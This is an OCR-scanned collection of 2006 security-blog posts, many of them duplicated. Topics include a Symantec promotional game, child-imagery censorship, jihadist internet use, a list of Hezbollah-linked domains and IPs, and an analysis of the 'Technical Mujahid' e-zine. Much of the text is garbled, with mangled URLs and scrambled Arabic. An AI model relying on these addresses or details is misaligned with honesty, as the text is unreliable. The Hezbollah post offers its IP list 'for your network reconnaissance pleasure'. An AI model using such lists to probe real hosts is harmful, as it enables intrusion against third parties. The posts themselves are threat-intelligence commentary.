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NELL DONE!! 


VOU HAVE SUCCESSFULLV PROTECTED 
VOUR DIGITAL PHOTOS FROM THE 
INVISIBLE BURGLAR 




VOUR SCORE i 140 
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Symantec's Invisible Burglar Game (2006-12-07 
15:45) 

Cheers to Symantec's PR folks for coming up with such an 
[l]entertaining promotion of Norton 360, so that 11 if 
everything gets too much hit the spacebar to activate the 
Norton 360 force field to destroy everything in sight. 11 

Good one! 

Try the infamous [2]Airport security flash game too, and 
search everyone for exploding toothpastes, and other 

dangerous substances as they become dangerous throughout 
the game. 

1. http://www.svmantec.com/invisiblebur a lar 

2. http://ddanchev.blo as pot.com/2006/09/airport-securit v- 
flash- a ame.html 
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Symantec's Invisible Burglar Game (2006-12-07 
16:46) 

[ 1 ] 

Cheers to Symantec's PR folks for coming up with such an 
[2]entertaining promotion of Norton 360, so that 11 if 
everything gets too much hit the spacebar to activate the 
Norton 360 force field to destroy everything in sight. 11 

Good one! 

Try the infamous [3]Airport security flash game too, and 
search everyone for exploding toothpastes, and other 

dangerous substances as they become dangerous throughout 
the game. 

1. 

https://web.archive.Or g /web/20101016192214/httD://4.bD.bl 
oas pot.com/_wlCH hTiOmrA/RX a bS9wu i AI/AAAAAAAAAE4/l 

a 6 uQKlFAo/sl600-h/missionl. ipg 

2. http://www.svmantec.com/invisiblebur a lar 

3. http://ddanchev.blo as pot.com/2006/Q9/airport-securit v- 
flash- a ame.html 
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HEY EVERYBOOYf DON'T LOOK AT THIS/ IT'S REALLY 
OPPENSIVE/ WOW/ THAT IS SOOO OPPENSIVE' THERE 
IS NO MAY YOU SHOUCO LOOK AT THIS THING THAT 
YOU PROBABLY WOULDN'T NORMALLY THINK OP 
LOOKING AT ANYWAY/ YOU WOULDN'T BELIEVE IT. 



Censoring Seductive Child Behaviour (2006-12-08 
02:46) 

[1] define:seductive 

[2] define:unaware 

[3] define:immature 

[4] define:maturing 

" Covert pedophilia in the Victorian society ". Is that a 
good line, or is that a good line? [5]Censorship as a matter of 
viewpoint - as of recently Globe and Mail want you to 
purchase the article without realizing the click-through rates 
for both, Doubleclick serving the ads at their site and them, if 
it were distributing it for free, but anyway 

[6]guess they should have told Google either: 

11 The Legards' central thesis is that the debate over children 
and sexual imagery has been dominated and dis- 








torted by two opposing myths: one is "the quasi-religious 
conception of childhood innocence," which involves "the 
irrational denial of childhood sexuality"; the other is "the 
ideology" of the artist as someone "possessing mystical 
abilities and unique rights" that should not be constrained by 
the state. 11 

After [7]thoughtcrime and intention-crime policing, it's about 
time behaviour-policing starts taking place, now 

wouldn't that be truly outrageous? Something no one is 
again going to do anything about, thinking he's either the 

only one seeing it, or perhaps prefers to keep playing in his 
own corner? 

Anyway, discussions like these should only happen after the 
real problem, with real child porn online gets 

solved. And that wouldn't happen by fighting the distribution 
channels as they're too many to control and police, 

but by making sure the production stage never happens at 
the first place. 

Another article on the topic M [8]Clothed Child Porn Online? 11 . 
By the way, are you finally seduced now? A 

rocket scientist doesn't seem to be, throughout the 11 
[9]decade of dedicating downloading". Such a collection can 
now definitely acts as a new [10]digitally fingerprinted 
database to [ll]keep track of. 

1. http://www. a oo a le.com/search? 
hl=en&q = define%3Aseductive 

2. http://www. a oo a le.com/search? 
hl=en&lr=&a = define%3Aunaware 










3. http://www. a oo a le.com/search? 
h I=en&g = define%3Ai immature 

4. http://www. a oo a le.com/search? 
hl=en&q = define%3Amature 

5. 

http://www.the a lobeand mail.com/servlet/storv/RTGAM .20061 
127.wxblackf1ash27/BNStorv/Entertainment/home 
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6. htt p://209.85.135.104/search? 

a = cache: k a SMhbORWEs I : www.the a lobeandmail.com/servlet/ 
storv/RTGAM.20061127.wxb 

lackf1ash27/BNStorv/Entertainment/+ls+it+child + oorn + or 

7. http://en.wikipedia.or g /wiki/thou a htcrime 

8. http://www.redherrin a .com/Article.asox? 

a = 19972&hed = Clothed + Child + Porn+Online%3F 

9. http://breakin a news.iol.ie/news/storv.as o? 
ji -2Q2611410&p = zxz6 vzvv6 

10 . 

http://www.there a ister.co.uk/2006/06/28/isos_ille a al ima g e c 
rackdown/ 

11 . 

http://www.there a ister.co.uk/2003/04/14/us a ov builds hu ae 
child/ 
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Censoring Seductive Child Behaviour (2006-12-08 
16:50) 

[ 1 ] 

[2] define:seductive 

[3] define:unaware 

[4] define:immature 

[5] define:maturing 

" Covert pedophilia in the Victorian society ". Is that a 
good line, or is that a good line? [6]Censorship as a matter of 
viewpoint - as of recently Globe and Mail want you to 
purchase the article without realizing the click-through rates 
for both, Doubleclick serving the ads at their site and them, if 
it were distributing it for free, but anyway 

[7]guess they should have told Google either: 

11 The Legards' central thesis is that the debate over children 
and sexual imagery has been dominated and dis¬ 
torted by two opposing myths: one is "the quasi-religious 
conception of childhood innocence," which involves "the 
irrational denial of childhood sexuality"; the other is "the 
ideology" of the artist as someone "possessing mystical 
abilities and unique rights" that should not be constrained by 
the state. 11 

After [8]thoughtcrime and intention-crime policing, it's about 
time behaviour-policing starts taking place, now 


wouldn't that be truly outrageous? Something no one is 
again going to do anything about, thinking he's either the 



only one seeing it, or perhaps prefers to keep playing in his 
own corner? 

Anyway, discussions like these should only happen after the 
real problem, with real child porn online gets 

solved. And that wouldn't happen by fighting the distribution 
channels as they're too many to control and police, 

but by making sure the production stage never happens at 
the first place. 

Another article on the topic M [9]Clothed Child Porn Online?". 
By the way, are you finally seduced now? A 

rocket scientist doesn't seem to be, throughout the 11 
[10]decade of dedicating downloading". Such a collection 
can now definitely acts as a new [ 11 ]digitally fingerprinted 
database to [12]keep track of. 

1 . 

https://web.archive.Or g /web/20101Q16192214/http://2.bp.bl 
oas pot.com/ wICHhTiOmrA/RX i DMdwu i FI/AAAAAAAAAFO/z 

MIO U888nF a /sl6QO-h/censorship_southpark. i pg 

2. http://www. a oo a le.com/search? 
hl=en&a = define%3Aseductive 

3. http://www. a oo a le.com/search? 
hl=en&lr=&g = define%3Aunaware 

4. http://www. a oo a le.com/search? 
h I=en&g = define%3Ai immature 

5. http://www. a oo a le.com/search? 
hl=en&g = define%3Amature 






























6 . 

http://www.the a lobeandmail.com/servlet/storv/RTGAM.20061 

127.wxblackf1ash27/BNStorv/Entertainment/home 

7. htt p://209.85.135.104/search? 

q = cache: k a SMhbORWEs I : www.the a lobeandmail.com/servlet/ 
storv/RTGAM.20061127.wxb 

lackfiash27/BNStorv/Entertainment/+ls+it+child + porn + or 

8. http://en.wikipedia.or a /wiki/thou a htcrime 

9. http://www.redherrin a .com/Article.aspx? 

a = 19972&hed = Clothed + Child + Pom+Online%3F 

10. http://breakin a news.iol.ie/news/storv.as p? 
i =202611410&p = zxz6 vzvv6 

11 . 

http://www.there a ister.co.uk/2006/06/28/isps ille g al ima g e c 
rackdown/ 

12 . 

http://www.there a ister.co.uk/2003/04/14/us_ a ov_builds_hu ae 

child/ 
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Current State of Internet Jihad (2006-12-10 16:52) 

[1] 

Very good article on various geopolitical issues related to the 
Middle East vs the West, and most importantly an 





































overview of the [2]current state of online jihad. Excluding 
webcasts, video howto's, and video games as a commodity 

in the big picture, what's left at the bottom line is easily 
accessible open source intelligence, and tactical warfare 
practices such as this one : 

11 Some of the techniques of evasion are disarmingly simple. 
Rather than send emails, some jihadists simply write and 
save draft emails, storing them in an account with a 
password that's known to other members of the cell. 

Because 

they are never actually sent, they can't be detected by 
intelligence agencies. 11 

Can you intercept an email that's never been sent? And what 
if a legitimate user's account end up as a dead 

box? Moreover, the article points out to the recently released 
[3]Technical Mujahid magazine : 

11 Raisman points to a recent publication by the al-Fajr group, 
another communications arm of ai-Qaeda and its fellow 
travellers. He said it contained a very sophisticated manual 
on internet security, how to avoid hackers, secure personal 
files and ensure any computer that is captured is of little 
value to Western authorities. " 

Going through the magazine itself as I indeed obtained a 
copy and will publish a summary of it anytime now, 

there's nothing really that very sophisticated to be afraid of, 
unless you know nothing about installing a virtual 


machine, or what triangulation is all about. 



A handy summary of the article and things to keep in 
mind : 

- There are over 5000 militant Islamic websites, up from less 
than a dozen in 1998 - these are only the static ones 
compared to hundreds more temporary campaign ones 

- They are an extremely effective way for terrorist groups to 
plan operations, recruit followers, raise funds and 

distribute propaganda - centralization of forces and services 
is exactly what a terrorist organization isn't into. 

Diversification and autonomous management for the sake of 
improving the continuity of the site in operation is what 

really matter, namely you'll have the propaganda platform 
spreading online details on how to donate cash on a site 

that's been set up for this purpose only. By the time there's 
been a leak in the "good guys" [4]covert competitive 
intelligence efforts, the donation site will dissapear and 
reappear somewhere else, while the central propaganda 

platform remains fully active. Take the other perspective, if 
the "bad guys" are aware the "good guys" are reading, they 
may logically leave a decoy to later on analyze how it's being 
processed and disinform on what may seem a very 

decent first-hand information gathered through open source 
intelligence. 

- Their mastery of the web could extend to cyber-terrorism, 
such as disabling the communication systems that 

underpin key sectors such as banking and energy - any 
government's single biggest mistake is [5]stereotyping about 



cyberterrorism, namely that it's the [6]offensive use of 
cyberterrorism to worry about, whereas the defensive, or 

passive concepts are already maturing. 

- Western agencies are almost powerless to stop the 
jihadists' internet activities - of course they aren't, and 
stopping compared to monitoring is totally wrong, the 
enemy's location you know is better than the enemy's 
location 

you don't know. 

- Western governments have been very stow to respond and 
are only now turning their attention to combating 

the potent "story" promulgated over the internet - they 
wouldn't be that very slow in responding if they actually 
knew how many people read and got brainwashed by it, thus 
what conversion rate can we talk about from a reader, 

to collaborator, to wannabe terrorist, come up with metrics 
and raise eyebrows. 
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1 . 

https://web.archive.Or g /web/20101016192214/http://3.bp.bl 
oas pot.com/ wICHhTiOmrA/RXxcttwu i GI/AAAAAAAAAGE/z 

CX20ao01v8/sl600-h/ i ihad for dummies .!pg 

2 . 

http://www.smh.com.au/news/world/fi a htin a-i ihad-in- 
c vberspace/2006/12/01/1164777 791383.html? 
paa e=full paae 


















#contentSwa pl 


3. http://siteinstitute.or g /bin/articles.c ai? 
ID=publications229606&Cate aorv= Dublications&Subcate aor 


y=0 


4. http://ddanchev.blo as pot.com/2006/05/covert- 
competitive-intelli a ence.html 

5. http://ddanchev.blo as pot.com/2005/12/cvberterrorism- 
dont-stereot v pe-and-its.html 

6. http://ddanchev.blo as pot.com/2006/10/scada-securit v- 
incidents-and-critical.html 
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Digital Terrorism and Hate 2006 CD-ROM (2006-12-10 
16:53) 

[ 1 ] 

In some of my previous investigative posts "[2]Tracking Down 
Internet Terrorist Propaganda", "[3]Ara- 

bic Extremist Group Forum Messages' Characteristics", " 
[4]Cyber Terrorism Communications and Propaganda", 

"[5]Steganography and Cyber Terrorism Communications", " 
[6]A Cost-Benefit Analysis of Cyber Terrorism", I extensively 
blogged about Cyberterrorism and emphasized on the 
defensive use of it, communication channels under [7]the 

shadow of SCADA devices and critical infrastructure getting 
attacked. Perspectives like these often [8]ruin someone's 






















self-mythology, but [9]the Pupper Master too made a point 
when saying that your desire to remain what you're is 

what limits you, so evolve, or end up on the verge of 
extinction. 

Here's a little [10]something for everyone thinking 
[ll]cyberterrorism is surreal. Considering for a while that 

even primitive forms of existence such as [12]street gangs 
utilize the [13]lnternet for propaganda, wouldn't a 

much better financed terrorist organization be compelled to 
participate? In fact they've been doing so [14]even 

before 9/11, but I feel it's the good guys' cavalier 
attitude that ended up in the now, mature cyberterrorism 
platform. 

A great source for [15]open source intelligence to anyone 
interested in, here's a summary : 

11 This sixth and newest version of the Simon Wiesenthai 
Center's annual report of problematic websites exposes the 
growing use of the Internet as a key propaganda weapon, 
marketing tool and fundraising engine by terrorist 

groups such as Al Qaeda and Hamas, in addition to its 
continuing assessment of traditional extremist groups such 

as the KKK and neo-Nazis. "Although they swear to destroy 
the West, extremists and terrorists have taken to using 
Western technology to recruit, finance and plan their 
insidious actions," said Mark Weitzman, Director of the Simon 
Wiesenthai Center's Task Force Against Hate. " 

Now what would an intelligence agency do when knowing 
exactly where to look? Shut them down and pros- 



ecute someone, or adapt deep within the community to 
[16]gatheras much OSINT as possible. Whatever the 

outcome, keep in mind on the possibility of indirect 
intelligence engineering, as the way you're watching 
them, the same way they're watching you, watching 
them. 

1 . 

https://web.arch ive.or a /web/20101016192 214/htto://2 .bo. bl 
oas PQt.com/ wICHhTiOmrA/RXiZAdwu i DI/AAAAAAAAAFc/U 

DaMQIEkNMk/sl600- 

h/di a ital%20Terronsm%2Qand%2QHate%20 

2. http://ddanchev.blo as pot.com/2006/Q6/trackin a -down- 
internet-terrorist.html 

3. http://ddanchev.blo as pot.com/2006/05/arabic-extremist- 
a roup-forum-messa a es.html 

4. http://ddanchev.blo as pot.com/2006/Q8/cvber-terrorism- 
communications-and 22.html 

5. http://ddanchev.blo as pot.com/2006/08/ste a ano araphv- 
and-cvber-terrorism.html 

6. http://ddanchev.blo as pot.com/20Q6/10/cost-benefit- 
analvsis-of-cvber.html 

7. http://ddanchev.blo as pot.com/2006/Q9/results-of-cvber- 
storm-exercise.html 


8. http://ddanchev.blo as pot.com/2006/Q6/bedtime-readin a- 
rome-inc.html 


9. http://en.wikipedia.or a /wiki/Pro i ect 2501 














































10 . 

httD://www.toolsfortolerance.com/site/c.pwKO I 8NS I rF/b.l486 
519/k.DC80/Di a ital_Terrorism_and Hate 2006.htm 

11. http://del.icio.us/DDanchev/Cvberterrorism 

12. http://www.msnbc.msn.com/id/11675822/site/newsweek/ 

13. http://www.zone-h.or g /content/view/13834/30/ 

14. http://www.ha a anah.or a .il/harchives/005680.html 

15. http://ddanchev.blo as pot.com/2006/Q9/cvber- 
intelli a ence-cvberint.html 

16. 

http://www.washin a tontimes.com/commentarv/200610Q7- 

104915-3656r.htm 
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Full List of Hezbollah's Internet Sites (2006-12-10 
16:55) 

[ 1 ] 

Some of [2]the propaganda is so catchy it can easily compete 
with the [3]Soviet propaganda posters during the 

Cold War visualizing the evil forces from their point of view. 
Great case studies on [4]lnternet psychological operations, 
and Hezbollah's understanding of [5]Cyberterrorism. 

Here's a list of the URLs mentioned : 


moqawama.org 


























moqawama.tv 

ghaliboun.net 

hizbollah.org 

nasrollah.org 

hizbollah.tv 

moqawama.info 

moqawama.net 

moqawama.org 

moqavemat.com 

moqavemat.ir 

shiaweb.org 

manartv.com.lb 

almanar.com.lb 

islamicdigest.net 

manartv.com.lb 

al-nour.net 

intiqadonline.com 

alintiqad.com 

alahed.org 

wa3ad.org 



islamicdigest.net 

somod.org 

bintjbeil.com 

altaybeh.net 

deirqanounalnahr.jeeran.com 

alshahid.org 

almahdiscouts.org 

jihadbinaa.org 

samirkuntar.org 

groups.msn.com/justiciadivinavenezuela 
es.groups.yahoo.com/group/Hezboallah Jatino 
groups.msn.com/autonomiaislamicawayuu 
groups.msn.com/Hezbollahelsalvador 
hezboallahpartidoislamico.blogspot.es 

And the IPs for your network reconnaissance pleasure 

82.137.205.249 

82.137.205.247 

202.75.42.155 


205.178.189.131 



216.21.229.196 
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202.71.104.241 

209.85.5.112 
203.121.71.217 
82.137.205.249 
82.137.205.249 
69.10.136.210 
207.44.244.117 
66.98.225.220 
209.172.35.181 

209.85.5.113 
208.64.28.10 
66.199.236.147 
Related posts: 

[6] Analysis of the Technical Mujahid Magazine - Issue One 

[7] Hezbollah's DNS Service Providers from 1998 to 2006 

[8] Hezbollah's use of Unmanned Aerial Vehicles - UAVs 

1 . 

https://web.arch ive.or a /web/20101016192 214/htto://4 .bp. bl 
oas PQt.com/ wlCHhTiOmrA/RXiRt9wu i BI/AAAAAAAAAFE/k 









Ufs7YR aO bo/sl600-h/Reload. ipg 


2. http://www.terrorism- 

info.or a .il/malam multimedia/Hebrew/heb n/html/hezbollah 
int.htm 

3. http://ddanchev.blo Qs pot.com/2006/09/soviet- 
propag anda-posters-durin g -cold.html 

4. http://ddanchev.blo Qs pot.com/2006/09/internet- psvops- 
ps vcholo g ical.html 

5. http://del.icio.us/DDanchev/Cvberterrorism 

6. http://ddanchev.blo QS POt.com/2006/12/analvsis-of- 
technical-mu i ahid-issue-one.html 

7. http://ddanchev.blo gs pot.com/2006/Q9/hezbollahs-dns- 
service-providers-frQm.html 

8. http://ddanchev.blo gs pot.com/2006/Q9/hezbollahs-use-of- 
unmanned-aerial.html 
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Current State of Internet Jihad (2006-12-10 21:11) 

































Very good article on various geopolitical issues related to the 
Middle East vs the West, and most importantly an 

overview of the [l]current state of online jihad. Excluding 
webcasts, video howto's, and video games as a commodity 

in the big picture, what's left at the bottom line is easily 
accessible open source intelligence, and tactical warfare 
practices such as this one : 

11 Some of the techniques of evasion are disarmingly simple. 

Rather than send emails, some jihadists simply 

write and save draft emails, storing them in an account with 
a password that's known to other members of the cell. 

Because they are never actually sent, they can't be detected 
by intelligence agencies. 11 

Can you intercept an email that's never been sent? And what 
if a legitimate user's account end up as a dead 

box? Moreover, the article points out to the recently released 
[2]Technical Mujahid magazine : 

11 Raisman points to a recent publication by the al-Fajr group, 
another communications arm of ai-Qaeda and its fellow 
travellers. He said it contained a very sophisticated manual 
on internet security, how to avoid hackers, secure personal 
files and ensure any computer that is captured is of little 
value to Western authorities. 11 

Going through the magazine itself as I indeed obtained a 
copy and will publish a summary of it anytime now, 

there's nothing really that very sophisticated to be afraid of, 
unless you know nothing about installing a virtual 



machine, or what triangulation is all about. 

A handy summary of the article and things to keep in 
mind : 

- There are over 5000 militant Islamic websites, up from less 
than a dozen in 1998 - these are only the static ones 
compared to hundreds more temporary campaign ones 

- They are an extremely effective way for terrorist groups to 
plan operations, recruit followers, raise funds and 

distribute propaganda - centralization of forces and services 
is exactly what a terrorist organization isn't into. 

Diversification and autonomous management for the sake of 
improving the continuity of the site in operation is what 

really matter, namely you'll have the propaganda platform 
spreading online details on how to donate cash on a site 

that's been set up for this purpose only. By the time there's 
been a leak in the "good guys" [3]covert competitive 
intelligence efforts, the donation site will dissapear and 
reappear somewhere else, while the central propaganda 

platform remains fully active. Take the other perspective, if 
the "bad guys" are aware the "good guys" are reading, they 
may logically leave a decoy to later on analyze how it's being 
processed and disinform on what may seem a very 

decent first-hand information gathered through open source 
intelligence. 

- Their mastery of the web could extend to cyber-terrorism, 
such as disabling the communication systems that 



underpin key sectors such as banking and energy - any 
government's single biggest mistake is [4]stereotyping about 
15 

cyberterrorism, namely that it's the [5]offensive use of 
cyberterrorism to worry about, whereas the defensive, or 
passive concepts are already maturing. 

- Western agencies are almost powerless to stop the 
jihadists' internet activities - of course they aren't, and 
stopping compared to monitoring is totally wrong, the 
enemy's location you know is better than the enemy's 
location 

you don't know. 

- Western governments have been very slow to respond and 
are only now turning their attention to combating 

the potent "story" promulgated over the internet - they 
wouldn't be that very slow in responding if they actually 
knew how many people read and got brainwashed by it, thus 
what conversion rate can we talk about from a reader, 

to collaborator, to wannabe terrorist, come up with metrics 
and raise eyebrows. 

1 . 

http://www.smh.com.au/news/world/fi a htin a-i ihad-in- 
c vberspace/2006/12/01/1164777 791383.html? 
paa e=full paae 

#contentSwa pl 

2. http://siteinstitute.or g /bin/articles.c ai? 

ID=publications229606&Cate aorv= publications&Subcate aor 

y=0 















3. http://ddanchev.blo as oot.com/2006/05/covert- 
comoetitive-mtelli a ence.html 


4. http://ddanchev.blo as pot.com/20Q5/12/cvberterrorism- 
dont-stereot v pe-and-its.html 

5. http://ddanchev.blo as pot.com/20Q6/10/scada-securit v- 
incidents-and-critical.html 
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Digital Terrorism and Hate 2006 CD-ROM (2006-12-11 
00:38) 

In some of my previous investigative posts "[l]Tracking Down 
Internet Terrorist Propaganda", M [2]Arabic Extremist Group 
Forum Messages' Characteristics", "[3]Cyber Terrorism 
Communications and Propaganda", "[4]Steganography and 
Cyber Terrorism Communications", "[5]A Cost-Benefit 
Analysis of Cyber Terrorism", I extensively blogged about 
Cyberterrorism and emphasized on the defensive use of it, 
communication channels under [6]the shadow of SCADA 

devices and critical infrastructure getting attacked. 
Perspectives like these often [7]ruin someone's self¬ 
mythology, 





















but [8]the Pupper Master too made a point when saying that 

your desire to remain what you're is what limits you, 

so evolve, or end up on the verge of extinction. 

Here's a little [9]something for everyone thinking 
[10]cyberterrorism is surreal. Considering for a while that 

even primitive forms of existence such as [ll]street gangs 
utilize the [12]lnternet for propaganda, wouldn't a 

much better financed terrorist organization be compelled to 
participate? In fact they've been doing so [13]even 

before 9/11, but I feel it's the good guys' cavalier 
attitude that ended up in the now, mature cyberterrorism 
platform. 

A great source for [14]open source intelligence to anyone 
interested in, here's a summary : 

11 This sixth and newest version of the Simon Wiesenthai 
Center's annual report of problematic websites exposes the 
growing use of the Internet as a key propaganda weapon, 
marketing tool and fundraising engine by terrorist 

groups such as Al Qaeda and Hamas, in addition to its 
continuing assessment of traditional extremist groups such 

as the KKK and neo-Nazis. "Although they swear to destroy 
the West, extremists and terrorists have taken to using 
Western technology to recruit, finance and plan their 
insidious actions," said Mark Weitzman, Director of the Simon 
Wiesenthai Center's Task Force Against Hate. 11 

Now what would an intelligence agency do when knowing 
exactly where to look? Shut them down and pros- 



ecute someone, or adapt deep within the community to 
[15]gatheras much OSINT as possible. Whatever the 

outcome, keep in mind on the possibility of indirect 
intelligence engineering, as the way you're watching 
them, the same way they're watching you, watching 
them. 

1. http://ddanchev.blo as pot.com/2006/Q6/trackin a -down- 
internet-terrorist.html 

2. http://ddanchev.blo as pot.com/2006/Q5/arabic-extremist- 
a roup-forum-messa a es.html 

3. http://ddanchev.blo as pot.com/2006/08/cvber-terroriism- 
communications-and 22.html 

4. http://ddanchev.blo as pot.com/2006/08/ste a ano araphv- 
and-cvber-terrorism.html 

5. http://ddanchev.blo as pot.com/20Q6/10/cost-benefit- 
analvsis-of-cvber.html 

6. http://ddanchev.blo as pot.com/2006/Q9/results-of-cvber- 
storm-exercise.html 

7. http://ddanchev.blo as pot.com/2006/Q6/bedtime-readin a- 
rome-inc.html 


8. http://en.wikipedia.or a /wiki/Pro i ect 2501 

9. 

http://www.toolsfortolerance.eom/site/c.pwKO I 8NS I rF/b.1486 
519/k.DC80/Di ci ital Terrorism and Hate 2006.htm 

10. http://del.icio.us/DDanchev/Cvberterrorism 
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11. http://www.msnbc.msn.com/id/11675822/site/newsweek/ 

12. http://www.zone-h.or g /content/view/13834/30/ 

13. http://www.ha a anah.or a .il/harchives/005680.html 

14. http://ddanchev.blo as pot.com/2006/Q9/cvber- 
intelli a ence-cvberint.html 

15. 

http://www.washin a tontimes.com/commentarv/200610Q7- 

104915-3656r.htm 
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Full List of Hezbollah's Internet Sites (2006-12-11 
00:56) 

Some of [l]the propaganda is so catchy it can easily compete 
with the [2]Soviet propaganda posters during the Cold 




























War visualizing the evil forces from their point of view. Great 
case studies on [3]lnternet psychological operations, 

and Hezbollah's understanding of [4]Cyberterrorism. 

Here's a list of the URLs mentioned : 

moqawama.org 

moqawama.tv 

ghaliboun.net 

hizbollah.org 

nasrollah.org 

hizbollah.tv 

moqawama.info 

moqawama.net 

moqawama.org 

moqavemat.com 

moqavemat.ir 

shiaweb.org 

manartv.com.lb 

almanar.com.lb 

islamicdigest.net 


manartv.com.lb 



al-nour.net 


intiqadonline.com 

alintiqad.com 

alahed.org 

wa3ad.org 

islamicdigest.net 

somod.org 

19 

bintjbeil.com 

altaybeh.net 

deirqanounalnahr.jeeran.com 

alshahid.org 

almahdiscouts.org 

jihadbinaa.org 

samirkuntar.org 

groups.msn.com/justiciadivinavenezuela 
es.groups.yahoo.com/group/Hezboallah Jatino 
groups.msn.com/autonomiaislamicawayuu 
groups.msn.com/Hezbollahelsalvador 
hezboallahpartidoislamico.blogspot.es 



And the IPs for your network reconnaissance pleasure 


82.137.205.249 

82.137.205.247 

202.75.42.155 

205.178.189.131 

216.21.229.196 

202.71.104.241 

209.85.5.112 
203.121.71.217 

82.137.205.249 

82.137.205.249 
69.10.136.210 
207.44.244.117 
66.98.225.220 
209.172.35.181 

209.85.5.113 
208.64.28.10 
66.199.236.147 
Related posts: 



[5] Analysis of the Technical Mujahid Magazine - Issue One 

[6] Hezbollah's DNS Service Providers from 1998 to 2006 

[7] Hezbollah's use of Unmanned Aerial Vehicles - UAVs 

1. htto://www.terrorism- 

info.or a .il/malam multimedia/Hebrew/heb n/html/hezbollah 
int.htm 

2. http://ddanchev.blo as DOt.com/2006/Q9/soviet- 
propaa anda-posters-durin a -cold.html 

3. http://ddanchev.blo as pot.com/2006/09/internet- psvops- 
ps vcholo a ical.html 

4. http://del.icio.us/DDanchev/Cvberterrorism 

5. http://ddanchev.blo as pot.com/20Q6/12/analvsis-of- 
technical-mu i ahid-issue-one.html 

6. http://ddanchev.blo as pot.com/2006/Q9/hezbollahs-dns- 
service-providers-frQm.htmi 

7. http://ddanchev.blo as pot.com/2006/Q9/hezbollahs-use-of- 
unmanned-aerial.html 
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Analysis of the Technical Mujahid - Issue One (2006- 
12-11 01:36) 

An [1]0SINT conducted, a tax payer's buck saved 
somewhere. 

Last week, the [2]mainstream [3]media was [4]abuzz with 
the release of the first jihadist e-zine discussing hacking, 

information hiding, of course in between the lines of radical 
propaganda, whereas no one was providing more infor¬ 
mation on the exact nature of the articles, but the [5]SITE 
institute. So I decided to take a peek at the [6]Technical 
Mujahid for myself, in order to break through the FUD, or not 
see the "threat sliced on pieces" by different news sources. 









According to the official release, [7]the magazine's download 
locations seem to be slowly becoming useless, 

besides the Rapidshare link which seems to be still [8]fully 
working - the Internet Haganah reasonably points out 

that owning a copy of it might get you in trouble in 
some countries, so don't. 

Despite that I don't speak any Arabic languages, and I 
pressume neither do you, the e-zine is rich on visual 
materials and you can pretty much grasp the big picture. 
Namely, that it's practical compared to theoretical source of 
information, it's targeting mixed audiences, and it's keeping 
it very simple. So I've decided to compile a summary of the 
key sections and topics in the articles covered for future 
references. In one sentence - its simplicity is not to be 
feared, but its practicality. 
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The release of the magazine is an indication of the ongoing 
use of the Internet for mass-education - economies of 

scale - through videos and visual howto's, but much more 
advanced information related to information security could 

be obtained from public sources. The cellphone 
triangulation in Iraq, and the demonstration of Hacker 
Defender are worth mentioning, but overall, concepts such 

as information warfare or online PSYOPS remain 
unstructured and 

abstract ideas to the average jihadist - for now. Notice 
the multimedia file used as an example for the alternate data 
stream as well and draw up the conclusions on your own. 

Don't exclude the logical possibility of on purposely 
disinforming the general public and various intel folks across 





the world on a relatively primitive inforwar practices such as 
using PGP and alternate data streams. 

Here are the articles themselves : 
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U:\f a.i»* \hxdeflkll 4 iOcii S 
C:S>not stop HaclcorDcfondorl00 

The service la not i*e a ponding to tlic control function. 
More help is Available by typing bin HELPIISU 2186. 

C:\>cd lajr 
C:\fajr >cd hxdef10BP 

C:\ f ajt» \hvdef 100!*>hxdefl fW.exe :-uninstall 


*JLai coJ 1 J i w jt 


iijii i'u cUJ aI&I J'jpJ 1 l..a—i ^ oil—' li £ 1 (1 

^ i—* y> •«—i*i? U-i j^Sy ^J' 5^ J J>Ur| wji (2 

01. Article One - Alternate Data Streams - steganography 
example given, rootkits - hacker defender covered, examples 
provided, abomosab.jpg used as an example 

02. Article Two - Satellite Communications and the 
importance of GPS, handheld GPS, explains 
triangulation, mentions satellite imagery's power, and 
satellite transfer speeds, mentions 1575 and 1227 as carrier 
frequencies and 

Digital Sequence Spread Specturm - DSSS, mentions 
handheld GPS receiver, includes photos of 3G data card, 











laptop. 

It then discusses a locked device with a "WARNING" sign on it 

03. Article Three - Visual HOWTO on Install VMware 

04. Article Four - Article on digital media players, the 
different formats, subtitles, and the NTSC and PAL systems, 

recording basics as it looks like 

05. Article Five - Introduction to PGP - Zimmerman is 
quoted, explanation of the RSA algorithm, recommending the 
use of PGP Whole Disk, features warning message that trial 
versions of PGP Whole Disk will self-decrypt 

And [9]SITE Institute's comments on the propaganda side in 
the introduction and conclusion : 

" For future issues, the editors urge members of the jihadist 
Internet community to submit articles in the field of 
technology for publishing. They write: "My kind, technical 
Mujahid brother, the magnitude of responsibility which is 
placed upon you is equal to what you know in the regard of 
information. Do not underestimate anything that you know; 
perhaps a small article that you write and publish can benefit 
one Mujahid in the Cause of Allah or can protect a brother of 
yours in Allah. This way you will gain the great reward with 
the permission of Allah. " 

If you perceive the Technical Mujahid magazine as a threat to 
the national security of any country, old issues of 

[10]Phrack magazine must be giving you the nightmares. 

Flave a productive week everyone, and [lljstay informed! 



1. http://ddanchev.blo as pot.com/2006/Q9/benefits-of-open- 
source-intelli a ence.html 

2. http://www.pcadvisor.co.uk/news/index.cfm7newsid = 7764 

3. http://www.pcworld.com/article/id . 128072- 
c. currentevents/a rticle.html 
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4. 

http://www.centcom.mil/sites/uscentcoml/What%20Extremis 

ts%20Sav/FirstlssueoftheTechnicalMu i ahid.aspx?Pa a eVi 

ew=Shared 

5. http://siteinstitute.or a /bin/articles.c ai? 
lD=publications229606&Cate aorv= publications&Subcate aor 
y=0 


6. http://teaanvma a .arabform.com/ 

7. http://internet- 

ha a anah.or g /hmedia/teaa n v ma a l announce/index.html 

8. http://www. a oo a le.com/search? 
hl=en&g=teaa n v ma a azinel.zi p 

9. http://siteinstitute.or g /bin/articles.c ai? 
lD=pubncations2296Q6&Cate aorv= publications&Subcate aor 
y=0 


10. http://www.phrack.or a/ 

11. http://del.icio.us/DDanchev 
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Analysis of the Technical Mujahid - Issue One (2006- 
12-11 16:57) 

[1] 

An [2]0SINT conducted, a tax payer's buck saved 
somewhere. 

Last week, the [3]mainstream [4]media was [5]abuzz with 
the release of the first jihadist e-zine discussing hacking, 

information hiding, of course in between the lines of radical 
propaganda, whereas no one was providing more infor¬ 
mation on the exact nature of the articles, but the [6]SITE 
institute. So I decided to take a peek at the [7]Technical 
Mujahid for myself, in order to break through the FUD, or not 
see the "threat sliced on pieces" by different news sources. 





According to the official release, [8]the magazine's download 
locations seem to be slowly becoming useless, 

besides the Rapidshare link which seems to be still [9]fully 
working - the Internet Haganah reasonably points out 

that owning a copy of it might get you in trouble in 
some countries, so don't. 

Despite that I don't speak any Arabic languages, and I 
pressume neither do you, the e-zine is rich on visual 
materials and you can pretty much grasp the big picture. 
